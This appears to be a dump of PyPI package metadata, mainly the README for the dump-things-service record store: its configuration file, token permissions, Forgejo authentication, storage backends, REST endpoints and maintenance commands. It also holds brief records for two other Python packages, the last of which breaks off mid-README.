supported: - `<storage root>`: (mandatory) the path of a directory that serves as anchor for all relative paths given in the configuration files. Unless `-c/--config` is provided, the service will search the configuration file in `<storage root>/.dumpthings.yaml`. - `--host <IP-address>`: The IP-address on which the service should accept connections (default: `0.0.0.0`). - `--port <port>`: The port on which the service should accept connections (default: `8000`). - `-c/--config <config-file>`: provide a path to the configuration file. The configuration file in `<storage root>/.dumpthings.yaml` will be ignored, if it exists at all. - `--origins <origin>`: add a CORS origin hosts (repeat to add multiple CORS origin URLs).` - `--root-path <path>`: Set the ASGI 'root_path' for applications submounted below a given URL path. - `--log-level`: set the log level for the service, allowed values are `ERROR`, `WARNING`, `INFO`, `DEBUG`. The default-level is `WARNING`. ```bash dump-things-service /data-storage/store --host 127.0.0.1 --port 8000 ``` The above command runs the service on the network location `127.0.0.1:8000` and provides access to the store under `/data-storage/store`. ### Configuration file The service is configured via a configuration file that defines collections, paths for incoming and curated data for each collection, as well as token properties. Token properties include a submitter identification and for each collection an incoming zone specifier, permissions for reading and writing of the incoming zone and permission for reading the curated data of the collection. A "formal" definition of the configuration file is provided by the class `GlobalConfig` in the file `dumpthings-server/config.py`. Configurations are read in YAML format. The following is an example configuration file that illustrates all options: ```yaml type: collections # has to be "collections" version: 1 # has to be 1 # All collections are listed in "collections" collections: # The following entry defines the collection "personal_records" personal_records: # The token, as defined below, that is used if no token is provided by a client. # All tokens that are provided by the client will be OR-ed with the default token. # That means all permissions in the default token will be added to the client provided # token. In this way the default token will always be less or equally powerful as the # client provided token. default_token: no_access # The path to the curated data of the collection. This path should contain the # ".dumpthings.yaml"-configuration for collections that is described # here: <https://concepts.datalad.org/dump-things-storage-v0/>. # A relative path is interpreted relative to the storage root, which is provided on # service start. An absolute path is interpreted as an absolute path. curated: curated/personal_records # The path to the incoming data of the collection. # Different collections should have different curated- and incoming-paths incoming: /tmp/personal_records/incoming # Optionally a list of classes that should receive store- or validate-endpoints, # if this list is present, all other classes defined in the schema will be ignored, # i.e., they will not receive store- and validation-endpoints. The classes listed # here must be in the schema. use_classes: - Organization - Person - Project - Agent # Optionally a list of classes that will be ignored when store- or validate-endpoints # are created. If `use_classes` is present, the entries of this list will further reduce # the classes that will receive endpoints. If `use_classes` is not present, the entries # of this list will reduce the classes from the schema that will receive endpoints. # The classes listed here must be listed in `use_classes` if that is defined. If # `use_classes` is not defined, they must be listed in the schema. ignore_classes: - Person - Project # The following entry defines the collection "rooms_and_buildings" rooms_and_buildings: default_token: basic_access curated: curated/rooms_and_buildings incoming: incoming/rooms_and_buildings # The following entry defines the collection "fixed_data", which does not # support data uploading, because there is no token that allows uploads to # "fixed_data". fixed_data: default_token: basic_access # If not upload is supported, the "incoming"-entry is not necessary. curated: curated/fixed_data_curated # All tokens are listed in "tokens" tokens: # The following entry defines the token "basic_access". This token allows read-only # access to the two collections: "rooms_and_buildings" and "fixed_data". basic_access: # The value of "user_id" will be added as an annotation to each record that is # uploaded with this token. user_id: anonymous # The collections for which the token holds rights are defined in "collections" collections: # The rights that "basic_access" carries for the collection "rooms_and_buildings" # are defined here. rooms_and_buildings: # Access modes are defined here: # <https://github.com/christian-monch/dump-things-server/issues/67#issuecomment-2834900042> mode: READ_CURATED # A token and collection-specific label, that defines "zones" in which incoming # records are stored. Multiple tokens can share the same zone, for example if # many clients with individual tokens work together to build a collection. # (Since this token does not allow write access, "incoming_label" is ignored and # left empty here (TODO: it should not be required in this case)). incoming_label: '' # The rights that "basic_access" carries for the collection "fixed_data" # are defined here. fixed_data: mode: READ_CURATED incoming_label: '' # The following entry defines the token "no_access". This token does not allow # any access and is used as a default token for the collection "personal_records". no_access: user_id: nobody collections: personal_records: mode: NOTHING incoming_label: '' # The following entry defines the token "admin". It gives full access rights to # the collection "personal_records". admin: user_id: Admin collections: personal_records: mode: WRITE_COLLECTION incoming_label: 'admin_posted_records' # The following entry defines the token "contributor_bob". It gives full access # to "rooms_and_buildings" for a user with the id "Bob". contributor_bob: user_id: Bob collections: rooms_and_buildings: mode: WRITE_COLLECTION incoming_label: new_rooms_and_buildings # The following entry defines the token "contributor_alice". It gives full access # to "rooms_and_buildings" for a user with the id "Alice". Bob and Alice share the # same incoming-zone, i.e. "new_rooms_and_buildings". That means they can read # incoming records that the other one posted. contributor_alice: user_id: Alice collections: rooms_and_buildings: mode: WRITE_COLLECTION incoming_label: new_rooms_and_buildings # The following entry defines a hashed token because the key `hashed` is set # to `True`. A hashed token has the structure # `<id>-<sha256>`. It will match an incoming token if the incoming token has # the structure `<id>-<content>` and if sha256(`<content>`) equals `<sha256>`. # In this example, if the client presents the token `bob-hello`, he will be # granted access because `sha256('hello')` equals # `2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824` bob-2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824: hashed: True collections: rooms_and_buildings: mode: WRITE_COLLECTION incoming_label: bob # ``` #### Backends The service currently supports the following backends for storing records: - `record_dir`: this backend stores records as YAML-files in a directory structure that is defined [here](https://concepts.datalad.org/dump-things-storage-v0/). It reads the backend configuration from a "record collection configuration file" as described [here](https://concepts.datalad.org/dump-things-storage-v0/). - `sqlite`: this backend stores records in a SQLite database. There is an individual database file, named `__sqlite-records.db`, for each curated area and incoming area. - `record_dir+stl`: here `stl` stands for "schema-type-layer". This backend stores records in the same format as `record_dir`, but adds special treatment for the `schema_type` attribute in records. It removes `schema_type`-attributes from the top-level mapping of a record before storing it as YAML-file. When records are read from this backend, a `schema_type` attribute is added back into the record, using a schema to determine the correct class-URI. In other words, all records stored with this backend will have no `schema_type`-attribute in the top-level, and all records read with this backend will have a `schema_type` attribute in the top-level. - `sqlite+stl`: This backend stores records in the same format as `sqlite`, but adds the same special treatment for the `schema_type` attribute as `record_dir+stl`. Backends can be defined per collection in the configuration file. The backend will be used for the curated area and for the incoming areas of the collection. If no backend is defined for a collection, the `record_dir+stl`-backend is used by default. The `+stl`-backends can be useful if an endpoint returns records of multiple classes, because it allows clients to determine the class of each result record. The service guarantees that backends of all types can co-exist independently in the same directory, i.e., there are no name collisions in files that are used for different backends (as long as no class name starts with `.` or `_`). The following configuration snippet shows how to define a backend for a collection: ```yaml ... collections: collection_with_default_record_dir+stl_backend: # This is a collection with the default backend, i.e. `record_dir+stl` and # the default authentication, i.e. config-based authentication. default_token: anon_read curated: collection_1/curated collection_with_forgejo_authentication_source: # This is a collection with the default backend, i.e. `record_dir+stl` and # a forgejo-based authentication source. That means it will use a forgejo # instance to determine the permissions of a token for this collection. # The instance is also used to determine the user-id and the incoming label. # In the case of forgejo, the user-id and the incoming label are the # forgejo login associated with the token. # We still need the name of a default token. If the token is defined in this # config file, its properties will be determined by the # config file. If the token is not defined in the config file, its # properties will be determined by the authentication sources. In this # example by the forgejo-instance at `https://forgejo.example.com`. # If there is more than one authentication source, they will be tried # in the order they are defined in the config file. default_token: anon_read # We still need a default token curated: collection_2/curated # Token permissions, user-ids (for record annotations), and incoming # label can be determined by multiple authentication sources. # If no source is defined, `config` will be used, which reads token # information from the config file. # This example explicitly defines `config` and a second authentication # source, a `forgejo` authentication source. auth_sources: - type: forgejo # requires `user`-read and `organization`-read permissions on token # The API-URL of the forgejo instance that should be used url: https://forgejo.example.com/api/v1 # An organization organization: data_handling # A team in the organization. The authorization of the team # determines the permissions of the token team: data_entry_personal # `label_type` determines how an incoming label is created for # a Forgejo token. If `label_type` is `team`, the incoming label # will be `forgejo-team-<organization>-<team>`. If `label_type` # is `user`, the incoming label will be # `forgejo-user-<user-login>` label_type: team # An optional instance id. This is used to disambiguate identical # user IDs on different Forgejo instances. If not set, a hash of # `url` will be used instead. instance_id: forgejo-server-1 # An optional repository. The token will only be authorized # if the team has access to the repository. Note: if `repository` # is set, the token must have at least repository read # permissions. repository: reference-repository # Fallback to the config file. - type: config # check tokens from the configuration file # Multiple authorization sources are allowed. They will be tried in the # order defined in the config file. If an authorization source returns # permissions for a token, those permissions will be used and no other # authorization sources will be queried. # The default authorization source is `config`, which reads the token # permissions, user-id, and incoming from the config file. collection_with_explicit_record_dir+stl_backend: default_token: anon_read curated: collection_3/curated backend: # The record_dir+stl backend is identified by the # type: "record_dir+stl". No more attributes are # defined for this backend. type: record_dir+stl collection_with_sqlite_backend: default_token: anon_read curated: collection_4/curated backend: # The sqlite-backend is identified by the # type: "sqlite". It requires a schema attribute # that holds the URL of the schema that should # be used in this backend. type: sqlite schema: https://concepts.inm7.de/s/flat-data/unreleased.yaml ``` #### Authentication and authorization To authenticate and authorize a user based on tokens, dumpthing-service uses authentication sources. There are currently two authentication sources: the configuration file and a Forgejo-based authentication source. Authentication sources can be configured per collection. If no authentication source is configured, the collection uses the configuration file. If authentication sources are configured, they will be tried in order until a token is authenticated. If an authentication source is listed twice, the second instance will be ignored. Authentication sources can be defined individually for each collection. The collection-level key `auth_sources` should contain a list of authentication source configurations. Authentication sources are tried in order until a token is successfully authenticated. If no authentication source authenticates the token, the token will be rejected. If no authentication source is defined, the configuration file will be used to authenticate tokens. If an identical authentication source is defined multiple times, the first instance will be queried, all other instances will be ignored. Authentication sources are identical if the content of their keys match. If an identical authentication source is listed multiple time in the configuration, the service will issue a warning about `Ignoring duplicate authentication provider...`. These authentication sources are available: - config: use the configuration file to authenticate tokens - forgejo: use a Forgejo-instance to authenticate tokens All authentication source configurations contain the key `type`. Additional keys are authentication source type-specific. The following configuration snippet contains an example for authentication source configuration: ```yaml collections: collection_with_config_and_forgejo_auth_sources: # Token permissions, user-ids (for record annotations), and incoming # label can be determined by multiple authentication sources. # If no source is defined, `config` will be used, which reads token # information from the config file. # This example explicitly defines `config` and a second authentication # source, a `forgejo` authentication source. auth_sources: - type: forgejo # requires `user`-read and `organization`-read permissions on token # The API-URL of the forgejo instance that should be used url: https://forgejo.example.com/api/v1 # An organization organization: data_handling # A team in the organization. The authorization of the team # determines the permissions of the token team: data_entry_personal # `label_type` determines how an incoming label is created for # a Forgejo token. If `label_type` is `team`, the incoming label # will be `forgejo-team-<organization>-<team>`. If `label_type` # is `user`, the incoming label will be # `forgejo-user-<user-login>` label_type: team # An optional repository. The token will only be authorized # if the team has access to the repository. Note: if `repository` # is set, the token must have at least repository read # permissions. repository: reference-repository # Fallback to the config file. - type: config # check tokens from the configuration file # Multiple authorization sources are allowed. They will be tried in the # order defined in `auth_sources`. If an authorization source returns # permissions for a token, those permissions will be used and no other # authorization sources will be queried. # The default authorization source is `config`, which reads the token # permissions, user-id, and incoming from the config file. ... ``` ##### Config-based authentication ```yaml collections: collection_with_config_authentication: default_token: anon_read curated: collection_5/curated auth_sources: - type: <must be 'config'> # check tokens from the configuration file ... ``` The configuration file will be used to authenticate tokens ##### Forgejo-based authentication ```yaml collections: collection_with_forgejo_authentication: default_token: anon_read curated: collection_5/curated auth_sources: - type: <must be 'forgejo'> url: <Forgejo API-URL> organization: <organization name> team: <team_name> label_type: <'team' or 'user'> repository: <repository name> # Optional ... ``` The defined Forgejo-instance will be used to authenticate a token The user ID is the email of the user. If `label_type` is set to `team`, the incoming label is `forgejo-team-<organization-name>-<team-name>`. If `label_type` is set to `user`, the incoming label is `forgejo-user-<user-login>` The permissions will be fetched from the units `repo.code` and `repo.actions` of the team definition. The following mapping is used: | `repo.code` | curated_read | incoming_read | incoming_write | curated_right | zones_access | |-------------|--------------|---------------|----------------|---------------|--------------| | `none` | `False` | `False` | `False` | `False` | `False` | | `read` | `True` | `True` | `False` | `False` | `False` | | `write` | `True` | `True` | `True` | `False` | `False` | | `repo.actions` | curated_read | incoming_read | incoming_write | curated_right | zones_access | |----------------|--------------|---------------|----------------|---------------|--------------| | `none` | `False` | `False` | `False` | `False` | `False` | | `read` | `False` | `False` | `False` | `False` | `False` | | `write` | `True` | `True` | `True` | `True` | `True` | A Forgejo authentication source can authenticate Forgejo-tokens that have at least the following `Read`-permissions: - User: this is required to determine user-related information, i.e. user-email and user login name. - Organization: this is required to determine the membership of a user to a team in an organization. - (Only if `repository` is set in the configuration) Repository : required to determine a team's access to the repository. #### Submission annotation tag The service annotates submitted records with a submitter id and a timestamp. Annotations consist of an annotation tag, defining the class of the annotation, and an annotation value. By default the service will use the class `http://purl.obolibrary.org/obo/NCIT_C54269` for the submitter id and the class `http://semanticscience.org/resource/SIO_001083` for submission time. (Both tags will be converted into CURIEs if the schema of the collection defines an appropriate prefix.) The default annotation tag classes can be overridden in the configuration on a per collection basis. To override the defaults tags, add a `submission_tags`-attribute to a collection definition. The `submission_tags`-attribute should contain a mapping that maps either `submitter_id_tag`, or `submitter_time_tag` or both to an IRI or a CURIE. If the schema defines a matching prefix, IRIs are automatically converted to CURIEs before storing the record. If a tag is given as a CURIE, the service validates that the prefix of the CURIE is defined in the schema of the collection. ```yaml type: collections version: 1 collections: collection_1: default_token: basic_access curated: curated incoming: contributions submission_tags: submitter_id_tag: schema:user_id submission_time_tag: schema:time ... ``` ### Endpoints Most endpoints require a *collection*. These correspond to the names of the "data record collection"-directories (for example `myschema-v3-fmta` in [Dump Things Service](https://concepts.datalad.org/dump-things-storage-v0/)) in the stores. The service provides the following user endpoints (In addition to user endpoints, there exist endpoints for curators. To view them, check the `/docs`-path in an installed service): - `POST /maintenance`: this endpoint allows to set a collection into mantenance mode. In maintenance mode, only tokens with curator-privileges can access the collection. The posted data is a JSON that contains the name of the collection and whether the maintenance state should be active or not, for example: ```json { "collection": "collection_1", "active": true } ``` - `POST /<collection>/record/<class>`: an object of type `<class>` (defined by the schema associated with `<collection>`) can be posted to this endpoint. It will be stored in the incoming area for this collection and the user defined by the provided token. In order to `POST` an object to the service, you MUST provide a valid token in the HTTP-header `X-DumpThings-Token` with write permissions. The endpoint supports the query parameter `format`, to select the format of the posted data. It can be set to `json` (the default) or to `ttl` (Terse RDF Triple Language, a.k.a. Turtle). If the `json`-format is selected, the content-type should be `application/json`. If the `ttl`-format is selected, the content-type should be `text/turtle`. The service supports extraction of inlined records as described in [Dump Things Service](https://concepts.datalad.org/dump-things-storage-v0/). On success, the endpoint will return a list of all stored records. The list may contain more than one record if the posted object contains inlined records. - `POST /<collection>/validate/record/<class>`: an object of type `<class>` (defined by the schema associated with `<collection>`) can be posted to this endpoint. It will validate the posted data. In order to `POST` an object to the service, you MUST provide a valid token in the HTTP-header `X-DumpThings-Token` with write permissions. The endpoint supports the query parameter `format`, to select the format of the posted data. It can be set to `json` (the default) or to `ttl` (Terse RDF Triple Language, a.k.a. Turtle). If the `json`-format is selected, the content-type should be `application/json`. If the `ttl`-format is selected, the content-type should be `text/turtle`. The service supports extraction of inlined records as described in [Dump Things Service](https://concepts.datalad.org/dump-things-storage-v0/). On success, the endpoint will return a list of all stored records. The list may contain more than one record if the posted object contains inlined records. - `GET /<collection>/records/<class>`: retrieve all readable objects from collection `<collection>` that are of type `<class>` or any of its subclasses. Objects are readable if the default token or the token provided has the permission to read the objects in the collection. Objects from incoming spaces will take precedence over objects from curated spaces, i.e. if there are two objects with identical `pid` in the curated space and in the incoming space, the object from the incoming space will be returned. The endpoint supports the query parameter `format`, which determines the format of the query result. It can be set to `json` (the default) or to `ttl`, The endpoint supports the query parameter `matching`, which is interpreted by `sqlite`-backends and ignored by `record_dir`-backends. If given, the endpoint will only return records for which the JSON-string representation matches the `matching` parameter. Matching supports the wildcard character `%` which matches any characters. For example, to search for `Alice` anywhere in the JSON-string representation of the record the matching parameter should be set to `%Alice%` or `%alice%` (matching is not case-sentitive). The result is a list of JSON-records or ttl-strings, depending on the selected format. - `GET /<collection>/records/p/<class>`: this endpoint (ending on `.../p/<class>`) provides the same functionality as the endpoint `GET /<collection>/records/<class>` (without `.../p/...`) but supports result pagination. In addition to the query parameters `format` and `matching`, it supports the query parameters `page` and `size`. The `page`-parameter defines the page number to retrieve, starting with 1. The `size`-parameter defines how many records should be returned per page. If no `size`-parameter is given, the default value of 50 is used. Each response will also contain the total number of records and the total number of pages in the result. The response is a JSON object with the following structure: ```json { "items": [ <JSON-record or ttl-string> ], "total": <total number of records in the result>, "page": <current page number>, "size": <number of records per page>, "pages": <number of pages in the result> } ``` - `GET /<collection>/record?pid=<pid>`: retrieve an object with the pid `<pid>` from the collection `<collection>` if the provided token allows reading. If the provided token allows reading of incoming and curated spaces, objects from incoming spaces will take precedence. The endpoint supports the query parameter `format`, which determines the format of the query result. It can be set to `json` (the default) or to `ttl`, - `GET /server`: this endpoint provides information about the server. The response is a JSON object with the following structure: ```json { "version": "<version of the server>", "collections": [ { "name": "collection_1", "schema": "https://example.org/schema_1.yaml", "classes": [ "Thing", "Agent", "InstantaneousEvent", "Person" ] }, { "name": "collection_2", "schema": "https://example.org/schema_2.yaml" "classes": [ "Thing", "AnnotationTag", "Organization", "Person" ] } ] } ``` - `GET /<collection>/records/`: retrieve all readable objects from collection `<collection>`. Objects are readable if the default token or the token provided has the permission to read the objects in the collection. Objects from incoming spaces will take precedence over objects from curated spaces, i.e. if there are two objects with identical `pid` in the curated space and in the incoming space, the object from the incoming space will be returned. The endpoint supports the query parameter `format`, which determines the format of the query result. It can be set to `json` (the default) or to `ttl`, The endpoint supports the query parameter `matching`, which is interpreted by `sqlite`-backends and ignored by `record_dir`-backends. If given, the endpoint will only return records for which the JSON-string representation matches the `matching` parameter. The result is a list of JSON-records or ttl-strings, depending on the selected format. - `GET /<collection>/records/p/`: this endpoint (ending on `.../p/`) provides the same functionality as the endpoint `GET /<collection>/records/` (without `.../p/`) but supports result pagination. In addition to the query parameters `format` and `matching`, it supports the query parameters `page` and `size`. The `page`-parameter defines the page number to retrieve, starting with 1. The `size`-parameter defines how many records should be returned per page. If no `size`-parameter is given, the default value of 50 is used. Each response will also contain the total number of records and the total number of pages in the result. The response is a JSON object with the following structure: ```json { "items": [ <JSON-record or ttl-string> ], "total": <total number of records in the result>, "page": <current page number>, "size": <number of records per page>, "pages": <number of pages in the result> } ``` - `DELETE /<collection>/record?pid=<pid>`: delete an object with the pid `<pid>` from the incoming area of the collection `<collection>` if the provided token allows writing to the incoming area. The result is either `True` if the object was deleted or `False` if the object did not exists or was not deleted. - `GET /docs`: provides information about the service's API, i.e. about all endpoints. #### Curation endpoints The service supports a set of curation endpoints that allows direct access to the curated area as well as the incoming areas. A `CURATOR`-token required to access these endpoints. Details about the curation endpoints can be found in [this issue](https://github.com/christian-monch/dump-things-server/issues/118). ### Tips & Tricks #### Using the same backend for incoming and curated areas The service can be configured in such a way that incoming records are immediately available in the curated area. To achieve this, the final path of the incoming zone must be the same as the curated area, for example: ```yaml type: collections version: 1 collections: datamgt: default_token: anon_read curated: datamgt/curated incoming: datamgt tokens: anon_read: user_id: anonymous collections: datamgt: mode: READ_CURATED incoming_label: "" trusted-submitter-token: user_id: trusted_submitter collections: datamgt: mode: WRITE_COLLECTION incoming_label: "curated" ``` In this example the curated area is `datamgt/curated` and the incoming area for the token `trusted-submitter-token` is `datamgt` plus the incoming zone `curated`, i.e., `datamgt/curated` which is exactly the curated area defined for `collection_1`. #### Migrating from `record_dir` (or `record_dir+stl`) to `sqlite` The command `dump-things-copy-store` can be used to copy a collection from a `record_dir` (or `record_dir+stl`) store to a `sqlite` store. The command expects a source and a destination store. Both are given in the format `<backend>:<directory-path>`, where `<backend>` is one of `record_dir`, `record_dir+stl`, `sqlite`, or `sqlite+stl`, and `<path>` is the path to the directory of the store. For example, to migrate a collection from a `record_dir`-backend at the directory `<path-to-data>/penguis/curated` to a `sqlite` backend in the same directory, the following command can be used: ```bash > dump-things-copy-store \ record_dir:<path-to-data>/penguis/curated \ sqlite:<path-to-data>/penguis/curated ``` For example, to migrate from a `record_dir+stl` backend, the command is similar, but a schema has to be supplied via the `-s/--schema` command line parameter. For example: ```bash > dump-things-copy-store \ --schema https://concepts.inm7.de/s/flat-data/unreleased.yaml \ record_dir+stl:<path-to-data>/penguis/curated \ sqlite:<path-to-data>/penguis/curated ``` (Note: a `record_dir:<path>` can be used to copy without the schema type layer from a `record_dir+stl` backend. But in this case the copied records will not have a `schema_type` attribute, because the `record_dir` backend does not "put it back in", unlike a `record_dir+stl` backend.) If the source backend is a `record_dir` or `record_dir+stl` backend, and the store was manually modified outside the service (for example, by adding or removing files), it is recommended to run the command `dump-things-rebuild-index` on the source store before copying. This ensures that the index is up to date and all records will be copied. If any backend is a `record_dir+stl` backend, a schema has to be supplied via the `-s/--schema` command line parameter. The schema is used to determine the `schema_type` attribute of the records that are copied. ### Maintenance commands - `dump-things-rebuild-index`: this command rebuilds the persistent index of a `record_dir`store. This should be done after the `record_dir` store was modified outside the service, for example, by manually adding or removing files in the directory structure of the store. - `dump-things-copy-store`: this command copies a collection that is stored in a source store to a destination store. For example, to copy a collection from a `record_dir` store at the directory `<path-to-data>/penguis/curated` to a `sqlite` store in the same directory, the following command can be used: ```bash > dump-things-copy-store \ record_dir:<path-to-data>/penguis/curated \ sqlite:<path-to-data>/penguis/curated ``` The copy command will add the copied records to any existing records in the destination store. Note: when records are copied from a `record-dir` store, the index is used to locate the records in the source store. If the index is not up-to-date, some records may not be copied. To ensure all records are copied, it is recommended to run `dump-things-rebuild-index` on the source store before copying. - `dump-things-pid-check`: this command checks the pids in all collections of a store to verify that they can be resolved (if they are in CURIE form). This is useful to validate the proper definition of prefixes after schema-changes. - `dump-things-create-merged-schema`: this command creates a new schema that statically contains all schemas that the original schema imports. The new schema is fully self-contained and does not reference any other schemas. ### If things go wrong #### Delete a record manually If a schema is changed, for example a prefix-definition changed, the service may not be able to delete a record anymore. In this case, the record can be deleted manually if you have access to the storage root. To delete the record, open a shell and navigate (`cd`) to the directory where the store is located. The location can be determined from the configuration file. Depending on the storage backend, the subsequent steps are different. ##### `record-dir` backend Delete the record from disk by removing it, e.g. `rm -f <path-to-record>` Run the command `dump-things-rebuild-index` ##### `sqlite` backend Run the command: ```bash > sqlite3 __sqlite-records.db ``` If you know the pid of the record you want to delete, enter the following on the prompt to delete the record with pid `some-pid`: ```sql > delete from thing where json_extract(thing.object, '$.pid') = 'some-pid'; ``` If you know the IRI of the record you want to delete, enter the following on the prompt to delete the record with IRI `some-iri`: ```sql > delete from thing where iri = 'some-iri'; ``` ### Requirements The service requires sqlite3. ## Acknowledgements This work was funded, in part, by - Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under grant TRR 379 (546006540, Q02 project) - MKW-NRW: Ministerium für Kultur und Wissenschaft des Landes Nordrhein-Westfalen under the Kooperationsplattformen 2022 program, grant number: KP22-106A
text/markdown
null
Christian Mönch <christian.moench@web.de>
null
null
null
null
[ "Development Status :: 4 - Beta", "Programming Language :: Python", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: P...
[]
null
null
>=3.8
[]
[]
[]
[ "aiohttp", "click", "fastapi-pagination", "fastapi[standard]", "fsspec", "linkml", "pydantic", "pyyaml", "rdflib", "requests", "sqlalchemy", "uvicorn" ]
[]
[]
[]
[ "Documentation, https://github.com/christian-monch/dump-things-server", "Issues, https://github.com/christian-monch/dump-things-server/issues", "Source, https://github.com/christian-monch/dump-things-server" ]
python-httpx/0.28.1
2026-02-19T22:27:51.517996
dump_things_service-5.5.0-py3-none-any.whl
82,716
24/c5/c9318fb6c180f38fd9d133ded13832dc6c59374c8116297b5c3e5e31663c/dump_things_service-5.5.0-py3-none-any.whl
py3
bdist_wheel
null
false
cbd5eb26e6e3678505c1c8b35b292c64
ab96ce2777a753f433f90cfd539a4e4d6d8ef8cf3a9d26f9140487436e2a1181
24c5c9318fb6c180f38fd9d133ded13832dc6c59374c8116297b5c3e5e31663c
MIT
[]
98
2.3
asam-qc-framework
1.1.0
Python ASAM Quality Checker Framework module. Executes bundles and creates result reports.
# asam-qc-framework This is the Python package for the ASAM Quality Checker Framework. Visit the [main GitHub repository](https://github.com/asam-ev/qc-framework) for detailed documentation.
text/markdown
Danilo Romano
danilo@ivex.ai
null
null
MPL-2.0
null
[ "License :: OSI Approved", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13" ]
[]
null
null
<4.0,>=3.10
[]
[]
[]
[ "asam-qc-baselib<1.2.0,>=1.1.0", "pydantic<3.0.0,>=2.7.2" ]
[]
[]
[]
[]
poetry/2.1.3 CPython/3.13.12 Windows/10
2026-02-19T22:26:48.122529
asam_qc_framework-1.1.0.tar.gz
13,264
3e/8e/18347237d28e534b26edc51d67856db6af852c74add4f80c94bc38d42878/asam_qc_framework-1.1.0.tar.gz
source
sdist
null
false
fc949589395c7c32312dbfce2589bbe4
b3af9c05340c59b351f9d075cf7af953e7fa92b5e250df00c4d802f5c5b9a6a0
3e8e18347237d28e534b26edc51d67856db6af852c74add4f80c94bc38d42878
null
[]
240
2.2
cjm-graph-plugin-system
0.0.5
Defines the standardized interface and data structures for Context Graph plugins, enabling the semantic linking, decomposition, and enrichment of multi-modal content.
# cjm-graph-plugin-system <!-- WARNING: THIS FILE WAS AUTOGENERATED! DO NOT EDIT! --> ## Install ``` bash pip install cjm_graph_plugin_system ``` ## Project Structure nbs/ ├── utils/ (2) │ ├── mermaid.ipynb # Convert GraphContext objects to Mermaid.js diagram strings for visualization │ └── slices.ipynb # Typed slice dataclasses for specifying referenced content regions in SourceRef ├── core.ipynb # DTOs for Context Graph operations with FileBackedDTO support for zero-copy transfer └── plugin_interface.ipynb # Domain-specific plugin interface for Context Graphs Total: 4 notebooks across 1 directory ## Module Dependencies ``` mermaid graph LR core[core<br/>Core Data Structures] plugin_interface[plugin_interface<br/>Graph Plugin Interface] utils_mermaid[utils.mermaid<br/>Mermaid Diagram Generation] utils_slices[utils.slices<br/>Segment Slice Specifications] plugin_interface --> core utils_mermaid --> core utils_slices --> core ``` *3 cross-module dependencies detected* ## CLI Reference No CLI commands found in this project. ## Module Overview Detailed documentation for each module in the project: ### Core Data Structures (`core.ipynb`) > DTOs for Context Graph operations with FileBackedDTO support for > zero-copy transfer #### Import ``` python from cjm_graph_plugin_system.core import ( SourceRef, GraphNode, GraphEdge, GraphContext, GraphQuery ) ``` #### Classes ``` python @dataclass class SourceRef: "A pointer to external data in another plugin's domain." plugin_name: str # e.g., "cjm-transcription-plugin-voxtral-hf" table_name: str # e.g., "transcriptions" row_id: str # e.g., "b0ceddd3-..." (typically a job_id) content_hash: str # Hash of consumed content in "algo:hexdigest" format segment_slice: Optional[str] # Optional slice: "char:0-500" or "timestamp:00:10-00:20" def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization """Convert to dictionary.""" return asdict(self) def verify( self, current_content: bytes # Current content bytes to verify against stored hash ) -> bool: # True if content matches the stored hash "Convert to dictionary." def verify( self, current_content: bytes # Current content bytes to verify against stored hash ) -> bool: # True if content matches the stored hash "Check if referenced content still matches the stored hash." def compute_hash( content: bytes, # Content to hash algo: str = "sha256" # Hash algorithm name ) -> str: # Hash string in "algo:hexdigest" format "Compute a content hash string for use in SourceRef." ``` ``` python @dataclass class GraphNode: "Represents an entity in the Context Graph." id: str # UUID label: str # e.g., "Person", "Concept", "Correction" properties: Dict[str, Any] = field(...) # Arbitrary metadata sources: List[SourceRef] = field(...) # Links to external plugins created_at: Optional[float] # Unix timestamp when created updated_at: Optional[float] # Unix timestamp when last updated def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization """Convert to dictionary with nested sources.""" return { "id": self.id, "Convert to dictionary with nested sources." ``` ``` python @dataclass class GraphEdge: "Represents a relationship between two nodes." id: str # UUID source_id: str # Origin node UUID target_id: str # Destination node UUID relation_type: str # e.g., "MENTIONS", "CORRECTS", "AUTHORED_BY" properties: Dict[str, Any] = field(...) # Arbitrary metadata created_at: Optional[float] # Unix timestamp when created updated_at: Optional[float] # Unix timestamp when last updated def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary." ``` ``` python @dataclass class GraphContext: "Container for graph query results (a subgraph)." nodes: List[GraphNode] # Nodes in the subgraph edges: List[GraphEdge] # Edges in the subgraph metadata: Dict[str, Any] = field(...) # Query metadata, stats, etc. def to_temp_file(self) -> str: # Absolute path to temporary JSON file """Save graph data to a temp file for zero-copy transfer.""" tmp = tempfile.NamedTemporaryFile(suffix=".json", delete=False, mode='w') data = { "nodes": [n.to_dict() for n in self.nodes], "Save graph data to a temp file for zero-copy transfer." def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization """Convert to dictionary.""" return { "nodes": [n.to_dict() for n in self.nodes], "Convert to dictionary." def from_file( cls, filepath: str # Path to JSON file ) -> "GraphContext": # Reconstructed GraphContext "Load graph context from a JSON file." def from_dict( cls, data: Dict[str, Any] # Dictionary with nodes, edges, metadata ) -> "GraphContext": # Reconstructed GraphContext "Load graph context from a dictionary." ``` ``` python @dataclass class GraphQuery: "A standardized query object for graph operations." query: str # Raw query string (SQL, Cypher, etc.) parameters: Dict[str, Any] = field(...) # Query parameters limit: int = 100 # Max results to return depth: int = 1 # Traversal depth for neighborhood queries def to_dict(self) -> Dict[str, Any]: # Dictionary representation for JSON serialization "Convert to dictionary." ``` ### Mermaid Diagram Generation (`mermaid.ipynb`) > Convert GraphContext objects to Mermaid.js diagram strings for > visualization #### Import ``` python from cjm_graph_plugin_system.utils.mermaid import ( context_to_mermaid ) ``` #### Functions ``` python def context_to_mermaid( ctx: GraphContext, # The GraphContext to visualize direction: str = "TD", # Diagram direction: "TD" (top-down) or "LR" (left-right) node_color_map: Optional[Dict[str, str]] = None # Map of node labels to CSS colors ) -> str: # Mermaid.js diagram string "Convert a GraphContext into a Mermaid.js diagram string." ``` ### Graph Plugin Interface (`plugin_interface.ipynb`) > Domain-specific plugin interface for Context Graphs #### Import ``` python from 